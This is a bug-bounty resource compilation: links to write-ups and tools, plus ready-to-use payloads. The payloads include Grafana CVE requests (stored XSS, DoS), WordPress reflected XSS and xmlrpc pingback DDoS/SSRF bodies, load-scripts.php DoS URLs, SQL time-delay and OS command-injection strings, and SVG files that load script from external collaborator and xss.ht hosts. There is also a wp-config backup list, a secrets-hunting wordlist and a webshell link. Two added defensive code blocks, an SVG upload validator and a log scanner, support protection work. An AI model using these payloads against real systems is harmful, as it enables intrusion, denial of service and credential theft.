Write-ups of all types of bugs
Bug bounty write-ups and exploit resources
2FA
1. 2FA bypass techniques https://www.mindmeister.com/1736437018?t=SEeZOmvt01
2. Two-factor authentication security testing and possible bypasses https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35
403 Forbidden Bypass
https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7
AEM applications Vulnerabilities
https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9
AWS-S3-Bucket
1. Testing for unauthorized file uploads on misconfigured AWS S3 buckets https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893
2. AWS pentesting https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898
3. Bypassing and exploiting Bucket Upload Policies and Signed URLs https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/
4. How to scan AWS's entire IP range to recon SSL certificates https://www.daehee.com/scan-aws-ip-ssl-certificates/
Adding email checklist
Adding email checklist https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310
Auto-Recon
Rengine
https://github.com/yogeshojha/rengine#quick-installation
CSV-Injection
Bug in Export to Spreadsheet functionality in web applications
1. Details https://www.contextis.com/en/blog/comma-separated-vulnerabilities
2. HackerOne report https://hackerone.com/reports/928280
CVES
1. CVE-2020-11022 / CVE-2020-11023 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
2. CVE-2020-11110 https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
   Version: Grafana v6.2.5
   Authentication: not required on v6.2.5
   Send a POST request to /api/snapshots with the following JSON body:
   {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
3. CVE-2021-24169 WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
   wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
4. CVE-2021-40875 Improper Access Control in Gurock TestRail versions ≤ 7.2.0.3014 results in sensitive file exposure: the /files.md5 file on the client side of a Gurock TestRail application discloses a full list of application files and their file paths. Those file paths can be tested and, in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
5. CVE-2021-26084 Remote Code Execution on Confluence Servers https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
Contact-support-page
1. Target Contact page tips
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156
Create/edit/remove ORG checklist
Checklist
https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158
Cross-Site WebSocket Hijack
Cross-Site WebSocket Hijack
https://github.com/DeepakPawar95/cswsh
https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830
DNS-misconfiguration
1. DNS misconfiguration details https://resources.infosecinstitute.com/topic/dns-hacking/
2. Misconfigured zone transfer https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/
DOS
1. denial of service with web cache poisoning
https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
2. DOS using
(((((()0)))))
https://hackerone.com/reports/993582
Email_Injection
https://pentestbook.six2dez.com/enumeration/web/email-attacks
File-Upload
1. https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/
2. https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934
3. https://secgeek.net/bookfresh-vulnerability/
4. https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a
5. https://portswigger.net/kb/issues/00500980_file-upload-functionality
6. https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/
7. https://hackerone.com/reports/191380
8. https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156
Firebase-Database-Takeover
Firebase Database Takeover
https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1
https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad
Get-into-BugBounty
Vickie Li writeup
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4
Graphql
Exploiting GraphQL
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
HTTP-method-testing
1. HTTP method testing by OWASP
https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)
Hunting-on-aspx-application
1. Hunting on ASPX Application For P1's [Unauthenticated SOAP,RCE, Info Disclosure]
https://0u.ma/m/3
ICMP Attacks
https://resources.infosecinstitute.com/topic/icmp-attacks/
JIRA-exploit-resources
JIRA CVE exploits
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
JS-analysis
1. Static analysis of client-side JavaScript https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
2. https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3
3. LinkFinder tool https://github.com/GerbenJavado/LinkFinder
4. Tool to find JS files on a website https://github.com/robre/scripthunter
5. A JavaScript change monitoring tool https://github.com/robre/jsmon
6. URL tracking for changes https://github.com/ahussam/url-tracker
7. This is a command line tool I use when I want to get notified, on Telegram (on my phone), that something has finished running (on my laptop) https://github.com/ShutdownRepo/telegram-bot-cli
JWT
1. JWT automated vulnerability scanner
https://hackerone.com/reports/993582
Java Deserialization
1. Java Deserialization scanner
https://github.com/joaomatosf/jexboss
Laravel-RCE
https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c
Login_page
1. Login page checklist
https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158
MY-Recon
Subdomain enumeration
subfinder -d domain.com -o file1.txt
assetfinder domain.com -o file2.txt
amass enum -d domain.com | tee -a file3.txt
Nginx
https://github.com/stark0de/nginxpwner
OAuth-Vulnerability
1. OAuth checklist https://www.binarybrotherhood.io/oauth2_threat_model.html
2. OAuth misconfiguration in a small time window of attack https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6
3. https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
4. OAuth checklist https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0
5. Pre-Access to Victim's Account via Facebook Signup https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d
Reconnaissance
1. https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115
2. https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af
3. https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html
4. OWASP Top 10: The Ultimate Guide
5. Recon by nahamsec https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119
6. https://www.bugbountyhunter.com/mobile/tutorials-and-guides
7. Scope based recon https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5
8. Mind maps https://github.com/imran-parray/Mind-Maps
9. GitHub recon https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
10. Recon methodology by @xcheater https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6
11. https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316
12. Pentester Land https://pentester.land/cheatsheets/2019/04/15/recon-resources.html
SQL-Injection
1. SQL checklist https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0
2. https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61
Time-delay payloads:
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
SSO
1. SSO Checklist
https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156
SSRF
1. SSRF bible https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h
2. Tips and tricks for SSRF https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf
3. SSRF payload in image upload
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://1y0ry36zsloshorypw4jca32mtsjg8.burpcollaborator.net/" x="0" y="0" height="200px" width="200px"/>
</svg>
4. Bypass by redirect through own server https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79
   https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5
SSTI
1. PortSwigger SSTI https://portswigger.net/web-security/server-side-template-injection
2. https://verneet.com/fuzzing-77-till-p1/
3. https://gauravnarwani.com/injecting-6200-to-1200/
4. SSTI wordlist for fuzzing https://github.com/err0rr/SSTI/blob/master/Wordlist
Scripting
Oneliner Script
https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder
Setting-page-Checklist
1. Settings page checklist
https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156
Shopping-Application
1. Vulnerabilities in shopping application
https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155
Subdomain Enumeration
1. DNS subdomain scanner https://github.com/rbsec/dnscan
2. Subdomain enumeration guide https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need
Wordlist
1. Collection of wordlists https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md
2. Dictionary list https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a
3. CommonSpeak wordlist https://github.com/pentester-io/commonspeak
WriteUps
1. HackerOne https://hackerone.com/hacktivity
2. Bugreader https://bugreader.com/reports
3. HackerOne report PoC videos https://github.com/bminossi/AllVideoPocsFromHackerOne
4. Pentester Land https://pentester.land/list-of-bug-bounty-writeups.html
5. Sillydaddy https://www.sillydaddy.me/
XSS
1. Browser's XSS Filter Bypass Cheat Sheet https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
2. Stored XSS using file upload https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e
3. XSS Through Parameter Pollution https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2
4. XSS via HTTP Headers https://brutelogic.com.br/blog/xss-via-http-headers/
5. Blind XSS in SVG file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200" height="200" zoomAndPan="disable" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve">
  <!-- Script linked from the outside -->
  <script xlink:href="https://smaul1.xss.ht" />
  <script>
  //<![CDATA[
  alert("Smaul");
  ]]>
  </script>
</svg>
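A defender-side counterpart to the SVG payloads in item 3 of the SSRF section and item 5 above, added here and not taken from any project on this page: an upload validator that rejects the features those two payloads rely on. The sample SVGs inside it are constructed from the page's payloads with `.example` placeholder hosts in place of the collaborator domains.

```python
"""Reject uploaded SVGs carrying the features the SSRF / blind-XSS payloads
on this page rely on: DOCTYPE/ENTITY declarations, <script> elements
(inline or xlink:href'd), on* event handlers, and hrefs that point
anywhere but a same-document fragment. Added example for this page."""
import re
import xml.etree.ElementTree as ET

# elements that execute code or pull in remote content
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# only href="#someid" passes; http(s):, javascript:, data: and
# protocol-relative values all fail this pattern
SAFE_HREF_RE = re.compile(r"^#[\w.\-]+$")
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def _local(qname):
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(data):
    """Return the reasons to reject this SVG text; an empty list means clean."""
    findings = []
    if DTD_RE.search(data):
        # an external DTD makes any fetching parser reach out to the network
        findings.append("doctype/entity declaration")
    try:
        root = ET.fromstring(data)  # stdlib expat does not fetch the DTD
    except ET.ParseError as exc:
        return ["unparseable xml: %s" % exc]
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append("<%s> element" % tag)
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append("event handler %s on <%s>" % (name, tag))
            elif name == "href" and not SAFE_HREF_RE.match(value.strip()):
                findings.append("external href on <%s>: %s" % (tag, value.strip()))
    return findings


def is_safe_svg(data):
    return not svg_findings(data)


# constructed samples modelled on this page's payloads; the .example hosts
# are placeholders standing in for the collaborator hosts in the originals
SSRF_UPLOAD_SVG = (
    '<?xml version="1.0" standalone="no"?>'
    '<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
    '"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
    '<svg width="200px" height="200px" version="1.1" '
    'xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<image xlink:href="https://collaborator.example/" x="0" y="0" height="200px" width="200px"/></svg>'
)
BLIND_XSS_SVG = (
    '<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<script xlink:href="https://blind-xss.example/hook.js"/>'
    '<script>//<![CDATA[\nalert(1);\n]]></script></svg>'
)
BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
    'width="10" height="10"><defs><linearGradient id="g"/></defs>'
    '<rect width="10" height="10" fill="url(#g)"/><use xlink:href="#g"/></svg>'
)
```

Run `svg_findings()` on each upload before it is stored; anything other than an empty list should be rejected, and the list itself is a usable log message.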
email-verification
1. https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126
2. Email bounce https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68
identify what something is
Identify anything. pyWhat easily lets you identify emails, IP addresses, and more
https://github.com/bee-san/pywhat
reset-password
https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19
tools
Subdomain enumeration tools
https://github.com/projectdiscovery/subfinder
https://github.com/OWASP/Amass
https://github.com/hannob/tlshelpers/blob/master/getsubdomain
https://github.com/tomnomnom/assetfinder
Get subdomains from IPs
https://github.com/SpiderLabs/HostHunter
https://github.com/infosec-au/altdns
https://github.com/ProjectAnte/dnsgen
https://github.com/blechschmidt/massdns
Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl
https://github.com/lc/gau
GitHub recon
https://github.com/techgaun/github-dorks
https://github.com/michenriksen/gitrob
https://github.com/eth0izzle/shhgit
https://github.com/anshumanbh/git-all-secrets
https://github.com/hisxo/gitGraber
Get alerted if a new subdomain appears on the target
https://github.com/yassineaboukir/sublert
1. Bug bounty tools by m4ll0k https://github.com/m4ll0k/Bug-Bounty-Toolz
web-shell
https://github.com/tennc/webshell/blob/master/README_EN.md
WordPress
1. Create database
   /wp-admin returns a 403 status; bypass it using /wp-admin/setup-config.php?step=1, which allows you to create a database.
2. xmlrpc.php
   This is one of the common issues on WordPress. To get some bucks for this misconfiguration you have to exploit it fully and show the impact properly as well.
   Detection: visit site.com/xmlrpc.php and you get an error message saying only POST requests are accepted.
   Exploit: intercept the request and change the method from GET to POST.
   List all methods:
   <methodCall>
     <methodName>system.listMethods</methodName>
     <params></params>
   </methodCall>
   Check whether the pingback.ping method is present.
   Perform DDoS:
   <methodCall>
     <methodName>pingback.ping</methodName>
     <params>
       <param><value><string>http://<YOUR SERVER >:<port></string></value></param>
       <param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string></value></param>
     </params>
   </methodCall>
   Perform SSRF (internal port scan only):
   <methodCall>
     <methodName>pingback.ping</methodName>
     <params>
       <param><value><string>http://<YOUR SERVER >:<port></string></value></param>
       <param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string></value></param>
     </params>
   </methodCall>
3. WP user enumeration
   This issue is only accepted when the target website is hiding its current users or they are not publicly available, since an attacker can use that user data for brute-forcing and other things.
   Detection: visit
   site.com/wp-json/wp/v2/users/
   http://target.com/?author=1
   http://target.com/?rest_route=/wp/v2/users
   You will see JSON data with user info in the response.
4. Denial of Service via load-scripts.php
   http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
   h1 report
5. Denial of Service via load-styles.php
   http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
6. Log files exposed
   http://target.com/wp-content/debug.log
7. Backup copies of wp-config exposed
   .wp-config.php.swp
   wp-config.inc
   wp-config.old
   wp-config.txt
   wp-config.html
   wp-config.php.bak
   wp-config.php.dist
   wp-config.php.inc
   wp-config.php.old
   wp-config.php.save
   wp-config.php.swp
   wp-config.php.txt
   wp-config.php.zip
   wp-config.php.html
   wp-config.php~
8. WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
   wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
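A defender-side complement to items 1 to 7 above, added here and not taken from WordPress or any linked project: a small scanner that tags these request patterns in combined-format access-log lines. The log lines it ships with are constructed (RFC 5737 test addresses), and the handle threshold is an assumed value.

```python
"""Flag the WordPress abuse patterns listed above in access-log lines.
Added example for this page (not WordPress or any project's code): tags
xmlrpc.php POSTs, user enumeration via ?author= and the wp/v2/users REST
route, load-scripts.php / load-styles.php requests carrying an abnormal
number of handles (the DoS vector), and probes for setup-config.php,
debug.log and wp-config backup copies."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# assumed threshold: wp-admin pages request a few dozen handles, the payload above sends hundreds
MAX_LOAD_HANDLES = 60
# the backup-name variants from item 7 as one pattern
WPCONFIG_BACKUP_RE = re.compile(
    r"/\.?wp-config(\.php)?(\.(swp|inc|old|txt|html|bak|dist|save|zip)|~)$", re.I
)


def classify(method, request_path):
    """Return a tag for a suspicious request, or None for anything else."""
    parts = urlsplit(request_path)
    path = parts.path.lower()
    qs = parse_qs(parts.query)
    if path.endswith("/xmlrpc.php") and method == "POST":
        return "xmlrpc-post"
    if "/wp-json/wp/v2/users" in path or any(
        v.startswith("/wp/v2/users") for v in qs.get("rest_route", [])
    ):
        return "user-enumeration-rest"
    if "author" in qs:
        return "user-enumeration-author"
    if path.endswith(("/wp-admin/load-scripts.php", "/wp-admin/load-styles.php")):
        handles = sum(len(v.split(",")) for v in qs.get("load", []))
        if handles > MAX_LOAD_HANDLES:
            return "load-dos(%d handles)" % handles
    if path.endswith("/wp-admin/setup-config.php"):
        return "setup-config-probe"
    if path.endswith("/wp-content/debug.log"):
        return "debug-log-probe"
    if WPCONFIG_BACKUP_RE.search(path):
        return "wp-config-backup-probe"
    return None


def scan(lines):
    """Return (findings, hits_per_ip); each finding is (ip, tag, request_path)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tag = classify(m["method"], m["path"])
        if tag:
            findings.append((m["ip"], tag, m["path"]))
    return findings, Counter(ip for ip, _, _ in findings)


# constructed access-log lines using RFC 5737 test addresses, not real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2021:13:55:36 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2021:13:55:40 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2021:13:55:41 +0000] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Oct/2021:13:56:02 +0000] "GET /wp-admin/load-scripts.php?load='
    + ",".join(["jquery-ui-core"] * 75) + ' HTTP/1.1" 200 9000 "-" "python-requests/2.25"',
    '198.51.100.9 - - [10/Oct/2021:13:56:05 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 0 "-" "python-requests/2.25"',
    '198.51.100.9 - - [10/Oct/2021:13:56:06 +0000] "GET /wp-content/debug.log HTTP/1.1" 200 30211 "-" "python-requests/2.25"',
    '192.0.2.44 - - [10/Oct/2021:13:57:00 +0000] "GET /wp-admin/load-scripts.php?load=jquery-core,jquery-migrate,utils HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2021:13:57:01 +0000] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]
```

`scan(SAMPLE_LOG)` tags the six probing requests from the first two addresses and leaves the ordinary wp-admin and index.php traffic from the third untouched; the per-IP counter is what you would alert or rate-limit on.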
GitHub-Dorks
1. GitHub dorks https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147
2. Automation for finding high-entropy strings in git repos https://github.com/trufflesecurity/truffleHog
SearchEngine
1. Search Engine dorks
https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310
TravisCI
1. Automation that fetches repos, builds, and logs for any given organization from TravisCI
https://github.com/lc/secretz
os command injection
|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|nslookup -q=cname my.burpcollaborator.net.&
Grafana
1. CVE-2020-13379 (Denial of Service)
   <GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
2. CVE-2020-11110 (Stored XSS)
   POST /api/snapshots HTTP/1.1
   Host: <GRAFANA URL>
   Accept: application/json, text/plain, */*
   Accept-Language: en-US,en;q=0.5
   Referer: {{BaseURL}}
   content-type: application/json
   Connection: close

   {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
3. CVE-2019-15043 (Grafana Unauthenticated API)
   POST /api/snapshots HTTP/1.1
   Host: <GRAFANA URL>
   Connection: close
   Content-Length: 235
   Accept: */*
   Accept-Language: en
   Content-Type: application/json

   {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
4. Default credentials
   Try to log in using admin as both username and password.
5. Signup enabled
   <GRAFANA URL>/signup
Admin access Endpoint
/dev/register/
/stag/register/
/dev/login/
/register/
/internal/
/stag/
Admin access Subdomains
dev
stag
admin
internal
stag-dev
stag-admin
internal-dev
Os command injection
/cgi-bin/parameter=payload
WordPress wordlist
wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
wp-admin/setup-config.php?step=1
Wordlist for secrets: find secrets in JS and on GitHub
cloudinary://
CONFIG
DB_NAME
DB_USER
DB_PASSWORD
DB_HOST
bucket name
Jenkins
OTP
oauth
authoriztion
password
pwd
ftp
dotfiles
JDBC
key-keys
send_key-keys
send,key-keys
token
user
login-signin
passkey-passkeys
pass
secret
SecretAccessKey
app_AWS_SECRET_ACCESS_KEY
AWS_SECRET_ACCESS_KEY
credentials
config
security_credentials
connectionstring
ssh2_auth_password
aws_access_key
aws_secret_key
S3_BUCKET
S3_ACCESS_KEY_ID
S3_SECRET_ACCESS_KEY_ID
S3_ENDPOINT
